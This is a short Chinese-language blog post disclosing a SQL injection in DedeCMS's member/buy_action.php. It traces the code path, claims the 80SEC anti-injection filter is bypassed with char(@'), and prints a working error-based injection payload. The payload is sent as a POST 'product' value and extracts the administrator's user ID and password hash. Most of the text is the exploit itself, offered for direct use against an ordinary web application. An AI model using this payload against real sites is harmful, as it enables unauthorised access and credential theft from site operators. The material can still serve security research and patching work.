Author:Sunshie
QQ:1141056911
Blog:http://phpinfo.me
F4ck Team & Ezenteam
#######################
今天无聊逛乌云发现有人提交了个漏洞,不知道和我的是不是一样的,没公开看不了
去官网看了下还没出补丁 更新时间:2013年9月12日
于是我下载了DEDECMS到本地来看看
在member/buy_action.php中存在注入
Sql经过ExecuteNoneQuery函数,于是跟踪ExecuteNoneQuery函数
发现sql经过CheckSql函数
于是找CheckSql函数
原来是80SEC的防注入 这个已经被大牛绕过了 直接char(@'
)就可以过了
于是构造注入语句!
INSERT INTO #@__member_operation(buyid
, pname
, product
, money
, mtime
, pid
, mid
, sta
,oldinfo
)
VALUES (‘M2T1389683145RN868′, ”, ’1141056911′ and char(@'
) and (SELECT
1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select
(concat(0xC3DCC2EB,userid,0x3a,pwd)) from #@__admin
limit
0,1),1,62)))a from information_schema.tables group by a)b))#’ , ” ,
’1389683145′ , ’1′ , ’2′ , ’0′ , ”);
然后注册会员后
直接post http://127.0.0.1/dede/member/buy_action.php这个文件
exp:
product=1141056911' and char(@'
) and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (concat(0xC3DCC2EB,userid,0x3a,pwd)) from #@__admin
limit 0,1),1,62)))a from information_schema.tables group by a)b))#
成功注入!但是受gpc影响,只有gpc=Off时才能注入..
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论